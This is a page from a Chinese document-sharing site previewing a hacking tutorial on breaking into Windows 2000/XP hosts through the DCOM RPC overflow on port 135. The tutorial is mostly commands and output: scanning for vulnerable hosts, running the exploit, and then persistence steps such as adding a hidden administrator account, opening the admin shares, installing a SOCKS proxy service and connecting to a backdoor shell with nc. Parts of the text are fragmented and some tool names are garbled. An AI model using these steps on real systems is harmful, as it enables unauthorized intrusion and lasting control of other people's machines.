下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、最近,网上非常流行 dcomrpc ,那今天我们就教你详细的利用 dcomrpc 入侵。和入侵之后必 须做什么。需要的工具:很好的:X E扫描工具:X E溢出攻击工具:RpcDcom(通用溢出工具)脚本开启 telnet 工具: X E X E代理:X E后门程序: WinEggDropShellPro3thVersion 好了,该做的都做的差不多了。先使用X E扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要 135端口开放,(想必 随便扫一下就会发现有许多主机开放的 135端口 )第一个主机就被扫出来又此漏洞。看看有没有其他的漏洞或是若口令之类的 .我们可以使用流光扫描一下其他的缺陷主机
2、 开了 3389 端口我们可以上去看一下是 xp 版本还是 win2k 是 win2k server 版本展开命令行: 查看 dcomrpc 的用法 用法 dcomrpc -d options F:/hack>cd rpc/dcomrpcRPC DCOM Expl01t coded by .:. SecurityComplied and Modified by Expl01t Usage:dcomrpc -d <host> optionsOptions:-d: Hostname to attack Required-t: Type Default: 0-r: Return a
3、ddress Default: Selected from target-p: Attack port Default: 135-l: Bindshell port Default: 666Types:0 0x0018759f: Win2k-Universal1 0x0100139d: WinXP-Universal开始进行溢出:F:/hack>cd rpc/dcomrpc -d 0RPC DCOM remote expl01t - .:. SecurityComplied and recorrected by Expl01t + Resolving host.+ Done.+ Expl
4、01tingJust wait等到出现,说明溢出成功c:/winnt/system32> 接着我们建立用户c:/winnt/system32>net user blueye$ 1111 /add 命令成功完成。把用户添加成超级管理员c:/winnt/system32>net localgroup administrators blueye$ /add 命令成功完成。看看共享开了没有没有的话把共享开开c:/winnt/system32>net share 清单是空的。c:/winnt/system32>net share ipc$ 命令成功完成。c:/winnt/s
5、ystem32>net share admin$ 命令成功完成。 到这里我们入侵告一段落 建 立 IPC$ 连 接 ,也可以使用 tftp 上传 ,先和对方建立连接 F:/hack>net use 且不显示托盘c:/winnt/system32>net start r_server 启动服务安装 sock 代理把X E copy c:/winnt/system32c:/winnt/system32>sksockserver /install安装服务c:/winnt/system32>sksockserver -config port 1234 改c:/winnt/
6、system32>sksockserver -config starttype 2 端口定在 1234 自己可以开机自动启动c:/winnt/system32>net start skserver 启动服务最后删除共享net share ipc$ /delnet share admin$ /del在安装 radmin 的时候你发现有人已经安装了。 看操作 ( 我输入的内容 )后门连接F:/hack>nc 123456Welcome To WinEggDropShell Matrix VersionMelody #(pslist)Melody #(pskill r_server)Melody #(shell)c:/winnt/system32>(delX E)c:/winnt/system32>(delc:/winnt/system32>(delcopy 你自己的上去,然后安装 省事的办法直接导入注册表, 然后重新输入安装命令运行, 端口上面架上了密码。就可以了, 只是在原来默认这时,你就会有疑问了 ! 为什么我输入导入注册表命令不管用呢?出现什么 regedit 不是可运行的程序之类的。出现这样的情
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2026年电子商务运营与策略试题及答案详解
- 宿州市重点中学2026届高一生物第二学期期末综合测试试题含解析
- 2026年人力资源考试实操题库
- 2026年证券从业资格考试辅导证券市场基础知识预测模拟试题
- 2026年文学知识竞赛古诗词赏析模拟题库
- 2026年编程基础概念编程逻辑测试题
- 湖北省黄冈市浠水实验高中2026届数学高一下期末考试试题含解析
- 2026年营养师专业能力测试题及答案详解助力健康生活
- 2026年中级经济师经济法专业高频考点精讲模拟题
- 2026届山西省忻州市忻州一中高一下生物期末质量检测模拟试题含解析
- 2025年电力机车司机职业技能竞赛理论考试题库(含答案)
- 手术器械包装操作
- 电梯维保服务方案及措施
- 《风力发电机组 叶片防雷系统设计规范编制说明》
- 医院消防安全宣传教育
- 医院感染管理基本知识培训
- TSHXCL 0021-2024 温差电致冷组件用晶棒
- DL∕T 1290-2013 直接空冷机组真空严密性试验方法
- 亚马逊全球开店:2024亚马逊日本机会品类动向调查报告-床上用品
- 水岸·琉璃园-山东淄博留仙湖公园景观设计
- 人教版三年级上册脱式计算200题及答案
评论
0/150
提交评论